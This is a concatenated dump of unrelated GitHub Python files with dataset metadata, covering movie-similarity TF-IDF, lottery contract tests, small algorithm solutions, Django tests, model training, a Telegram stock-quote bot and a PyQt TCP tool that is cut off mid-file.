In[48]:\n\n\nclist=credits2['cast']\nklist=keywords2['keywords']\nmlist=movies2['original_title']\n# print(mlist)\n\n\n# In[49]:\n\n\nclist=np.array(clist)\ncastlist=[]\nfor j in range(0,len(clist)):\n tempstr=clist[j]\n tg=[i for i in range(len(tempstr)) if tempstr.startswith('name\\':', i)]\n th=[i for i in range(len(tempstr)) if tempstr.startswith('order\\':', i)]\n tempsr=\"\"\n for k in range(0,len(tg)):\n temps=tempstr[tg[k]+8:th[k]-4]\n tempss=temps.replace(\" \", \"\")\n tempsr=tempsr+tempss+\" \"\n tempsr=tempsr.strip()\n castlist.append(tempsr)\n\n\n# In[50]:\n\n\nprint(castlist[0])\n\n\n# In[51]:\n\n\nklist=np.array(klist)\nkeylist=[]\nfor j in range(0,len(klist)):\n tempstr=klist[j]\n tg=[i for i in range(len(tempstr)) if tempstr.startswith('name\\':', i)]\n th=[i for i in range(len(tempstr)) if tempstr.startswith('}', i)]\n tempsr=\"\"\n for k in range(0,len(tg)):\n temps=tempstr[tg[k]+8:th[k]-1]\n tempss=temps.replace(\" \", \"\")\n tempsr=tempsr+tempss+\" \"\n tempsr=tempsr.strip()\n keylist.append(tempsr)\n\n\n# In[52]:\n\n\nprint(keylist[0])\n\n\n# In[53]:\n\n\nmlist=np.array(mlist)\nmovlist=[]\nfor j in range(0,len(mlist)):\n tempstr=mlist[j]\n movlist.append(tempstr)\n\n\n# In[54]:\n\n\nprint(movlist[0])\n\n\n# In[55]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nvectorizer = TfidfVectorizer()\nX = vectorizer.fit_transform(castlist)\nprint(X.shape)\n\n\n# In[57]:\n\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nvectorizer = TfidfVectorizer()\nY = vectorizer.fit_transform(keylist)\nprint(Y.shape)\n\n\n# In[60]:\n\n\nCCS=[]\nfor i in range(0,Y.shape[0]):\n CCS.append(cosine_similarity(Y[i:i+1],Y)[0])\nCCS=np.array(CCS)\n\n\n# In[61]:\n\n\nKCS=[]\nfor i in range(0,X.shape[0]):\n KCS.append(cosine_similarity(X[i:i+1],X)[0])\nKCS=np.array(KCS)\nprint(KCS)\n\n\n# In[62]:\n\n\nCS=0.7*KCS+0.3*CCS\nwith open('./CS.pkl', 'wb+') as f:\n pickle.dump(CS, f)\n\n\n# In[3]:\n\n\nmovino=0\nintresarr=CS[movino]\nmvnameintr=movlist[movino]\nintresarr=np.array(intresarr)\nindxar=np.argsort(intresarr)[-10:]\n# print(indxar)\nk=[]\nx=[]\ny=[]\nfor i in indxar:\n k.append(movlist[i])\n x.append(KCS[movino][i])\n y.append(CCS[movino][i])\n# width of the bars\nbarWidth = 1\n# Choose the height of the blue bars\nbars1 = [10, 9, 2]\n\n# Choose the height of the cyan bars\nbars2 = [10.8, 9.5, 4.5]\n\n# Choose the height of the error bars (bars1)\nyer1 = [0.5, 0.4, 0.5]\n\n# Choose the height of the error bars (bars2)\nyer2 = [1, 0.7, 1]\n\n# The x position of bars\nr1 = 2.5*np.arange(len(x))\nr2 = [i + barWidth for i in r1]\n# print(r1)\n# print(r2)\n\n# Create blue barsnp.\nplt.barh(r2, y, color = 'red', edgecolor = 'black', capsize=10, label='Cast Similarity')\nplt.barh(r1, x, color = 'blue', edgecolor = 'black', capsize=10, label='Keyword Similarity')\n\n# Create cyan bars\n\n\n# general layout\nplt.yticks([r + barWidth for r in r1], k)\nplt.xlabel('Similarity')\nplt.legend()\nplt.title('Top Similar Movies like '+mvnameintr)\n# Show graphic\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rajat1401/SML-Project","sub_path":"TF-IDF.py","file_name":"TF-IDF.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3711412650","text":"# Expected eth for entry => 0.0284079610470038 eth => 28407961047003800 wei (approx.)=> 28000000000000000\n\nfrom brownie import Lottery, accounts, config, network, exceptions\nfrom scripts.deploy_lottery import deploy_lottery\nfrom scripts.support_functions import (\n LOCAL_BLOCKCHAIN_ENVIRONMENTS,\n get_account,\n fund_with_link,\n get_contract,\n)\nfrom web3 import Web3\nimport pytest\n\n\ndef test_getEntranceFee():\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip()\n lottery = deploy_lottery()\n entrance_fee = lottery.getEntranceFee()\n expected_entrance_fee = Web3.toWei(0.025, \"ether\")\n assert expected_entrance_fee == entrance_fee\n\n\ndef test_cant_enter_unless_started():\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip()\n lottery = deploy_lottery()\n with pytest.raises(exceptions.VirtualMachineError):\n lottery.enter({\"from\": get_account(), \"value\": lottery.getEntranceFee()})\n\n\ndef test_can_start_and_enter_lottery():\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip()\n lottery = deploy_lottery()\n account = get_account()\n lottery.startLottery({\"from\": account})\n lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n assert lottery.players(0) == account\n\n\ndef test_can_enter_lottery():\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip()\n lottery = deploy_lottery()\n account = get_account()\n lottery.startLottery({\"from\": account})\n lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n fund_with_link(lottery)\n lottery.endLottery({\"from\": account})\n assert lottery.lottery_state() == 2\n\n\ndef test_can_pick_winner_correctly():\n if network.show_active() not in LOCAL_BLOCKCHAIN_ENVIRONMENTS:\n pytest.skip()\n lottery = deploy_lottery()\n account = get_account()\n lottery.startLottery({\"from\": account})\n lottery.enter({\"from\": account, \"value\": lottery.getEntranceFee()})\n lottery.enter({\"from\": get_account(index=1), \"value\": lottery.getEntranceFee()})\n lottery.enter({\"from\": get_account(index=2), \"value\": lottery.getEntranceFee()})\n fund_with_link(lottery)\n transaction = lottery.endLottery({\"from\": account})\n request_ID = transaction.events[\"RequestedRandomness\"][\"requestID\"]\n get_contract(\"vrf_coordinator\").callBackWithRandomness(\n request_ID, 816, lottery.address, {\"from\": account}\n )\n starting_balance = account.balance()\n lottery_balance = lottery.balance()\n assert lottery.recentWinner() == account\n assert lottery.balance() == 0\n assert account.balance() == starting_balance + lottery_balance\n","repo_name":"Agi7an/SmartContract-Lottery","sub_path":"tests/test_lottery_unit.py","file_name":"test_lottery_unit.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39675564179","text":"def calc_file(filename='fuel.txt'):\r\n with open(filename) as stream:\r\n items = tuple(map(int, stream.readlines()))\r\n return sum(calc(x) for x in items)\r\n\r\n\r\ndef calc(given):\r\n fuel = given // 3 - 2\r\n if fuel < 1: return 0\r\n return fuel + calc(fuel)\r\n\r\n\r\nif __name__ == '__main__':\r\n total = calc_file()\r\n print(f\"result: {total}\")\r\n","repo_name":"Strangemother/python-advent-of-code","sub_path":"1-b-terse.py","file_name":"1-b-terse.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74007927786","text":"\"\"\"\nauthor: buppter\ndatetime: 2019-08-01 15:51\n\n题目描述:\nGiven an array of integers, return indices of the two numbers such that they add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n示例:\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\n解题思路:\n利用 Map\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n d = {}\n for k, i in enumerate(nums):\n if target - i in d:\n return [d[target - i], k]\n else:\n d[i] = k\n","repo_name":"buppter/algorithms","sub_path":"Leetcode/Map&Set/1_TwoSum.py","file_name":"1_TwoSum.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"15742276406","text":"from django.test import TestCase\nfrom books.models import Book\nfrom books.views import ExternalBookView\nfrom rest_framework.test import APIRequestFactory\n\n\nfactory = APIRequestFactory()\n\n# Create your tests here.\nclass BookModelTest(TestCase):\n \"\"\" Test module for Books model \"\"\"\n\n def setUp(self):\n Book.objects.create(\n name=\"Book 1\",\n isbn=\"123-122-2122\",\n authors=[\"User1\", \"User2\"],\n number_of_pages=250,\n publisher=\"ABC Publishers\",\n country=\"India\",\n release_date=\"2018-06-01\"\n )\n\n def test_book_publishers(self):\n book_data = Book.objects.get(name='Book 1')\n self.assertEqual(book_data.publisher, 'ABC Publishers')\n\n\nclass BookExternalAPITest(TestCase):\n \"\"\" Test module for Books External API views \"\"\"\n\n def test_success(self):\n request = factory.get('/api/external-books/?name=A Game of Thrones')\n response = ExternalBookView().get(request)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['data'][0]['name'], \"A Game of Thrones\")\n\n def test_empty(self):\n request = factory.get('/api/external-books/?name=A Game of')\n response = ExternalBookView().get(request)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['data'], [])","repo_name":"sakthipanneer/Book-API-Assignment","sub_path":"books/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23151402431","text":"from django import forms\nfrom .models import Tender\n\n\nclass TenderForm(forms.ModelForm):\n\n class Meta:\n model = Tender\n fields = ('deadline_app', 'date_publication', 'customer', 'brief_description',\n 'initial_price', 'contract_guarantee', 'place_performance',\n 'category', 'procurement_stage', 'type_purchase',\n )\n","repo_name":"dakhnovskaya/tenders","sub_path":"tenders_api/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759915148","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/6/28 9:49\n @Author : QDY\n @FileName: 334. 递增的三元子序列.py\n\n 给定一个未排序的数组,判断这个数组中是否存在长度为 3 的递增子序列。\n\n 数学表达式如下:\n\n 如果存在这样的i, j, k,且满足0 ≤ i < j < k ≤ n-1,\n 使得arr[i] < arr[j] < arr[k] ,返回 true ;否则返回 false 。\n 说明: 要求算法的时间复杂度为 O(n),空间复杂度为 O(1) 。\n\n 示例 1:\n 输入: [1,2,3,4,5]\n 输出: true\n\n 示例 2:\n 输入: [5,4,3,2,1]\n 输出: false\n\n\"\"\"\n\n\nclass Solution:\n def increasingTriplet(self, nums): # 双指针的贪心算法 时间O(N),空间O(1)\n low, mid = float('inf'), float('inf')\n for n in nums: # 从头扫描一次数组\n if n <= low: # low记录遇到的最小值\n low = n\n elif n <= mid: # mid记录比low大的最小值,mid指向的值有可能在low指向的值之前\n mid = n # mid best_val_acc :\n torch.save(model.state_dict(), 'bestefficient0.pt')\n best_val_acc = val_acc\n\n\n\n return model, train_losses, val_losses, train_accs, val_accs\n\n# Train Loss : 0.4077, Train Acc : 0.8465,\ndef main() :\n DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model = efficientnet_b2(pretrained=True)\n model.classifier[1] = nn.Linear(in_features=1408, out_features=74)\n model.to(DEVICE)\n\n train_transform = transforms.Compose([\n transforms.Resize((300,300)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ])\n\n val_transform = transforms.Compose([\n transforms.Resize((300,300)),\n transforms.ToTensor(),\n transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n ),\n ])\n\n # dataset\n train_dataset = CustomDataset(\"../data/train_images/\", transform=train_transform)\n val_dataset = CustomDataset(\"../data/val_images/\", transform=val_transform)\n\n # dataloader\n train_loader = DataLoader(train_dataset, batch_size=54, num_workers=4,\n pin_memory=True, shuffle=True)\n val_loader = DataLoader(val_dataset, batch_size=54, num_workers=4,\n pin_memory=True, shuffle=False)\n\n epochs = 100\n criterion = CrossEntropyLoss().to(DEVICE)\n optimizer = AdamW(model.parameters(), lr=0.001)\n\n train(model, train_loader, val_loader, epochs, DEVICE, optimizer, criterion)\n\nif __name__ == \"__main__\" :\n main()","repo_name":"1107c/recommend","sub_path":"train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29342268023","text":"import sys\nimport configparser\nimport collections\n\nimport requests\nimport numpy as np\n\nSOURCE = 'WIKI'\nDAYS = 5\n\nCFG_PATH = 'stocks.cfg'\nCSV_PATH = 'stocks.csv'\n\nAPI_URL = 'https://www.alphavantage.co/query?'\nQUERY = 'function=TIME_SERIES_DAILY&symbol={}&apikey={}'\n\ndef read_csv(path):\n try:\n with open(path, 'r') as csv:\n fileDat = [x.split(',') for x in csv.readlines()]\n except OSError as e:\n print('Failed to read csv.')\n return None\n\n return fileDat\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if len(args) != 1:\n print('Requires 1 argument.')\n else:\n config = configparser.ConfigParser()\n config.read(CFG_PATH)\n api_key = config['api']['api key']\n csv_stocks = read_csv(CSV_PATH)\n total_dollars = float(args[0])\n ratio_total = sum([int(x[1]) for x in csv_stocks])\n\n invest_names = []\n invest_dollars = []\n invest_shares = []\n\n for stock, ratio in csv_stocks:\n try:\n raw_data = requests.get(API_URL + QUERY.format(stock, api_key))\n stock_data = list(raw_data.json(object_pairs_hook=collections.OrderedDict)['Time Series (Daily)'].values())[:DAYS]\n # print(list(stock_data['Time Series (Daily)'].keys())[:DAYS])\n # bee = list(stock_data['Time Series (Daily)'].values())[:DAYS]\n hi = np.fromiter((float(x['2. high']) for x in stock_data), np.float_)\n lo = np.fromiter((float(x['3. low']) for x in stock_data), np.float_)\n mean_price = (np.mean(hi) + np.mean(lo)) / 2\n dollars = total_dollars * int(ratio) / ratio_total\n print('%s averaged $%0.2f per share over the last %d %s.' % (stock, mean_price, DAYS, 'day' if DAYS == 1 else 'days'))\n invest_names.append(stock)\n invest_dollars.append(dollars)\n invest_shares.append(dollars / mean_price)\n except KeyError as e:\n print('Error Occurred:')\n print(raw_data)\n\n print('\\nDollar Cost Averaging Advice:')\n\n for name in invest_names:\n print(name, end='\\t\\t')\n\n print()\n\n for dollars in invest_dollars:\n print('$%0.2f' % dollars, end='\\t')\n\n print()\n\n for shares in invest_shares:\n print('%0.2f shares' % shares, end='\\t')\n\n print()","repo_name":"Tonexus/stocks","sub_path":"stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3481815834","text":"import os\nimport torch\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\nfrom src.dataset import data_loader\n\n\n# function to count number of parameters\ndef get_n_params(model):\n np = 0\n for p in list(model.parameters()):\n np += p.nelement()\n return np\n\n\ninput_size = 224*224 * 3 # images are 224*224 pixels and has 3 channels because of RGB color\noutput_size = 2 # there are 2 classes---Cats and Dogs\n\n# number of subprocesses to use for data loading\nnum_workers = 0\n\n# how many samples per batch to load\nbatch_size = 64\n\n# define training and test data directories\ndata_dir = './data/'\ntrain_dir = os.path.join(data_dir, 'training_set/')\ntest_dir = os.path.join(data_dir, 'test_set/')\n\n# create transformers\nimage_size = (224, 224)\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\n\n\ntrain_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n\ntest_transforms = transforms.Compose([\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize(mean, std)])\n\n# read data set using the custom class\ntrain_dataset = data_loader(train_dir, transform=train_transform)\ntest_dataset = data_loader(test_dir, transform=test_transforms)\n\n# load data using utils\ntrain_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size,\n num_workers=num_workers, shuffle=True)\ntest_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size,\n num_workers=num_workers)\n\naccuracy_list = []\n","repo_name":"Hatran1412/Cat-Dog-classification","sub_path":"src/loadingdata.py","file_name":"loadingdata.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"753273612","text":"import sys\nimport random\n\nclass student: #宣告串列结构\n def __init__(self):\n self.num=0\n self.score=0\n self.next=None\n \ndef create_link(data,num): #建立串列副程式\n for i in range(num):\n newnode=student()\n if not newnode:\n print('Error!! 内存配置失败!!')\n sys.exit(0) \n if i==0: #建立串列首\n newnode.num=data[i][0]\n newnode.score=data[i][1]\n newnode.next=None\n head=newnode\n ptr=head\n else: #建立串列其他节点\n newnode.num=data[i][0]\n newnode.score=data[i][1]\n newnode.next=None\n ptr.next=newnode\n ptr=newnode\n newnode.next=head\n return ptr #回传串列\n\ndef print_link(head): #打印串列副程式\n i=0\n ptr=head.next\n while True:\n print('[%2d-%3d] => ' %(ptr.num,ptr.score),end='\\t')\n i=i+1\n if i>=3 : #每行打印三个元素\n print()\n i=0\n ptr=ptr.next\n if ptr==head.next:\n break\n\ndef concat(ptr1,ptr2): #连结串列副程式\n head=ptr1.next #在ptr1及ptr2中,各找任意一个节点\n ptr1.next=ptr2.next #把两个节点的next对调即可\n ptr2.next=head\n return ptr2\n\ndata1=[[None] * 2 for row in range(6)]\ndata2=[[None] * 2 for row in range(6)]\n\nfor i in range(1,7):\n data1[i-1][0]=i*2-1\n data1[i-1][1]=random.randint(41,100)\n data2[i-1][0]=i*2\n data2[i-1][1]=random.randint(41,100)\n\t\nptr1=create_link(data1,6) #建立串列1\nptr2=create_link(data2,6) #建立串列2\ni=0\nprint('\\n原 始 串 列 资 料:')\nprint('座号 成绩 \\t座号 成绩 \\t座号 成绩')\nprint('==========================================')\nprint(' 串列 1 :')\nprint_link(ptr1)\nprint(' 串列 2 :')\nprint_link(ptr2)\nprint('==========================================')\nprint('连结后串列:')\nptr=concat(ptr1,ptr2) #连结串列\nprint_link(ptr)\n","repo_name":"jtlai0921/MP31917_example","sub_path":"MP31917_example/ch03ok/CH03_11.py","file_name":"CH03_11.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6928031261","text":"n = int(input())\nl= []\nfor _ in range(n):\n l.append(list(map(int, input().split())))\n\nk = []\n\nfor index in range(4):\n my = []\n for index2 in range(n):\n if l[index2][index] == 1:\n my.append(index2)\n if len(my) > n/2:\n k.append(my)\n\nprint(k)\n\n# t = int(input())\n# for i in range(t):\n# n = int(input())\n# a = [[] for i in range(n)]\n# for j in range(n):\n# a[j] = list(map(int, input().split()))\n# ans = False\n# for j in range(5):\n# for k in range(5):\n# if k != j:\n# cnt1 = 0\n# cnt2 = 0\n# cntno = 0\n# for z in range(n):\n# if a[z][j] == 1:\n# cnt1 += 1\n# if a[z][k] == 1:\n# cnt2 += 1\n# if a[z][j] == 0 and a[z][k] == 0:\n# cntno += 1\n# if cnt1 >= n // 2 and cnt2 >= n // 2 and cntno == 0:\n# ans = True\n# if ans:\n# print('YES')\n# else:\n# print('NO')","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/group_1598B.py","file_name":"group_1598B.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12926906177","text":"import os\nimport sys\nimport subprocess\nimport platform\n\nSCRIPT_PATH = os.path.dirname(os.path.realpath(__file__))\n\nBAT = '.bat' if sys.platform.startswith(('cygwin', 'win')) else ''\nGRADLE_BIN = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'gradle', 'bin',\n 'gradle%s' % BAT\n )\n)\n\nANDROID_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'android_tools', 'sdk'\n )\n)\n\nif platform.system() == 'Darwin':\n JAVA_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'java', 'openjdk',\n 'Contents', 'Home'\n )\n )\nelse:\n JAVA_HOME = os.path.normpath(\n os.path.join(\n SCRIPT_PATH, '..', '..', '..', 'third_party', 'java', 'openjdk'\n )\n )\n\n\ndef main():\n if not os.path.isdir(ANDROID_HOME):\n raise Exception('%s (ANDROID_HOME) is not a directory' % ANDROID_HOME)\n\n android_dir = sys.argv[1]\n subprocess.check_output(\n args=[GRADLE_BIN] + sys.argv[2:],\n cwd=android_dir,\n env=dict(os.environ, ANDROID_HOME=ANDROID_HOME, JAVA_HOME=JAVA_HOME),\n )\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"flutter/engine","sub_path":"testing/rules/run_gradle.py","file_name":"run_gradle.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":6866,"dataset":"github-code","pt":"37"} +{"seq_id":"22724900236","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author demo \n@file: views.py\n@time 2018/4/9 下午2:08\n\"\"\"\nfrom rest_framework.views import exception_handler\n\n\ndef custom_exception_handler(exc, context):\n # Call REST framework's default exception handler first,\n # to get the standard error response.\n response = exception_handler(exc, context)\n\n if response is not None:\n if isinstance(response.data, dict):\n detail_data = response.data.get('detail')\n if detail_data:\n if isinstance(detail_data, list):\n detail_data = detail_data[0]\n elif isinstance(detail_data, dict):\n detail_data = detail_data.values()[0]\n response.data['detail'] = detail_data\n if isinstance(response.data, list):\n data = response.data\n\n response.data = {}\n response.data['detail'] = data[0]\n del data\n\n return response\n","repo_name":"guokaixin/django_my","sub_path":"src/django_my/common/utils/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22648377810","text":"#Exercícios: Extras de Python\n#Crieumprogramaqueleiaquantodinheiroumapessoatemnacarteira,ecalculequantopoderiacomprardecadamoedaestrangeira.\n\n\"\"\" dinheiro = float(input(\"Digite a quantidade de dinheiro na carteira (em reais): \"))\n\nconversoes = {\n \"Dólar Americano\": 4.91,\n \"Peso Argentino\": 0.02,\n \"Dólar Australiano\": 3.18,\n \"Dólar Canadense\": 3.64,\n \"Franco Suíço\": 0.42,\n \"Euro\": 5.36,\n \"Libra Esterlina\": 6.21\n}\n\nprint(\"\\nQuantidade que poderia comprar de cada moeda estrangeira:\")\nfor moeda, taxa in conversoes.items():\n quantidade = dinheiro / taxa\n print(f\"{moeda}: {quantidade:.2f}\")\n \"\"\"\n#2. Escrevaumprogramaquepergunteaquantidadedekmpercorridosporum\n# carroalugadoeaquantidadedediaspelosquaiselefoialugado.Calculeopreçoapagar,sabendoqueocarrocustaR$80,00pordiaeR$0,20porkmrodado.\n\"\"\" km_percorridos = float(input(\"Digite a quantidade de km percorridos: \"))\ndias_aluguel = int(input(\"Digite a quantidade de dias de aluguel: \"))\n\npreco_por_dia = 80.00\npreco_por_km = 0.20\n\npreco_total = (preco_por_dia * dias_aluguel) + (preco_por_km * km_percorridos)\n\nprint(\"O preço total a pagar é: R$\", preco_total) \"\"\"\n\n#3.Façaumalgoritmoqueleiaosaláriodeumfuncionárioemostreseunovosalário.\n\"\"\" \nsalario = float(input(\"Digite o salário do funcionário: \"))\n\nif salario <= 1000.00:\n novo_salario = salario * 1.20 # 20% de aumento\nelif salario <= 2800.00:\n novo_salario = salario * 1.10 # 10% de aumento\nelse:\n novo_salario = salario * 1.05 # 5% de aumento\n\nprint(\"Novo salário: R$\", novo_salario) \"\"\"\n\n#4. CrieumprogramaquetenhaafunçãoleiaInt(),quevaifuncionardeformasemelhanteàfunçãoinput()doPython,\n# sóquefazendoavalidaçãoparaaceitarapenasumvalornúmerico\n\nwhile True:\n try:\n numero = int(input(\"Digite um número inteiro: \"))\n break # Sai do loop se um valor válido for inserido\n except ValueError:\n print(\"Erro: Digite um valor numérico válido.\")\n\nprint(f\"Você digitou: {numero}\")","repo_name":"otilliasantos0411/Desafios-bootcamp-back-end-PythoneDjango","sub_path":"Desafio 1- primeira semana/Exercicio-extra.py","file_name":"Exercicio-extra.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30065662754","text":"from telegram.ext.updater import Updater\nfrom telegram.update import Update\nfrom telegram.ext.callbackcontext import CallbackContext\nfrom telegram.ext.commandhandler import CommandHandler\nfrom telegram.ext.messagehandler import MessageHandler\nfrom telegram.ext.filters import Filters\nimport requests\nimport urllib.parse\nimport os\n\ntoken = os.getenv(\"token\")\nsymbol = \"\"\nupdater = Updater(token, use_context=True)\n\n\ndef start(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\n\t\t\"Enter stock symbol to get quote\")\n\ndef help(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\"\"\"\n Enter stock symbol to get current price.\n\t\n\t\"\"\")\n\ndef lookup(symbol):\n \"\"\"Look up quote for symbol.\"\"\"\n \n # Contact API\n try:\n api_key = os.getenv(\"API_KEY\")\n url = f\"https://cloud.iexapis.com/stable/stock/{urllib.parse.quote_plus(symbol)}/quote?token={api_key}\"\n response = requests.get(url)\n response.raise_for_status()\n except requests.RequestException:\n pass\n\n # Parse response\n try:\n quote = response.json()\n return {\n \"name\": quote[\"companyName\"],\n \"price\": float(quote[\"latestPrice\"]),\n \"symbol\": quote[\"symbol\"]\n }\n except (KeyError, TypeError, ValueError):\n return {\n \"name\": \"Invalid\",\n \"price\": \"Invalid\",\n \"symbol\": \"Invalid\"\n }\n\ndef getQuote(update: Update, context: CallbackContext):\n global symbol\n symbol = update.message.text\n # update.message.reply_text(\"Sorry '%s' is not a valid command\" % update.message.text)\n quote = lookup(symbol)\n price = quote[\"name\"] + \" stock: $\"+ str(quote[\"price\"])\n update.message.reply_text(price)\n \n\n\ndef unknown_text(update: Update, context: CallbackContext):\n\tupdate.message.reply_text(\n\t\t\"Sorry I can't recognize you , you said '%s'\" % update.message.text)\n\n\nupdater.dispatcher.add_handler(CommandHandler('start', start))\n# updater.dispatcher.add_handler(CommandHandler('tesla', stock_quote))\nupdater.dispatcher.add_handler(CommandHandler('help', help))\n\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, getQuote))\nupdater.dispatcher.add_handler(MessageHandler(\n\tFilters.command, getQuote)) # Filters out unknown commands\n\n# Filters out unknown messages.\nupdater.dispatcher.add_handler(MessageHandler(Filters.text, unknown_text))\n\nupdater.start_polling()\n","repo_name":"1basilisk/tgBot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19222326562","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 9 09:35:01 2020\n\n@author: ASUS\n\"\"\"\n\n\nimport tkinter\nPythonGUI = tkinter.Tk()\nPythonGUI.geometry('640x480') # 設定主視窗預設尺寸為640x480\nPythonGUI.resizable(False,False) # 設定主視窗的寬跟高皆不可縮放\nPythonGUI.title('GUI test') # 設定主視窗標題\n\n# Code to add widgets will go here...\nPythonGUI.mainloop()\n\n","repo_name":"Arwen0905/Python_Test","sub_path":"Python_GUI/Python GUI/參考程式碼/tkinter_window_set.py","file_name":"tkinter_window_set.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36586766209","text":"import sys,ctypes,inspect,time,socket,threading,os,re\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5 import QtCore\n\nfrom ui import MainView\nfrom Logiclayer import tcp_server,tcp_client,web_server,auto_response\nfrom Logiclayer import stop_threading\nfrom pynput.keyboard import Key,Controller\n\nclass Tcp_nhs(QMainWindow,tcp_server.Tcp_server,tcp_client.Tcp_client,web_server.Web_server,auto_response.Auto_resp):\n signal_write_msg = QtCore.pyqtSignal(str)\n _translate = QtCore.QCoreApplication.translate\n def __init__(self,parent = None):\n super(Tcp_nhs,self).__init__(parent)\n\n self.tcp_socket = None\n self.udp_socket = None\n self.setupUi(self)\n self.defaultInit()\n self.connect()\n self.Setsocket()\n\n\n def Setsocket(self):\n # 创建TCP/UDP套接字\n self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # 将TCP套接字四次挥手后的TIME_WAIT状态取消\n self.tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n # 使用socket模块获取本机ip\n MY_IP = socket.gethostbyname(socket.gethostname())\n if self.comboBox.currentIndex() == 5:\n self.lineEdit_2.setText('')\n else:\n self.lineEdit_2.setText(str(MY_IP))\n\n def defaultInit(self):\n self.pushButton_3.setEnabled(False)\n self.pushButton_8.hide()\n self.plainTextEdit.setReadOnly(False)\n self.label_3.hide()\n self.lineEdit_4.hide()\n self.progressBar.hide()\n\n\n #绑定触发事件\n def connect(self):\n self.signal_write_msg.connect(self.write_msg)\n self.pushButton.clicked.connect(self.click_btn1)\n self.pushButton_2.clicked.connect(self.click_btn2)\n self.actioncs.triggered.connect(self.click_actioncs)\n 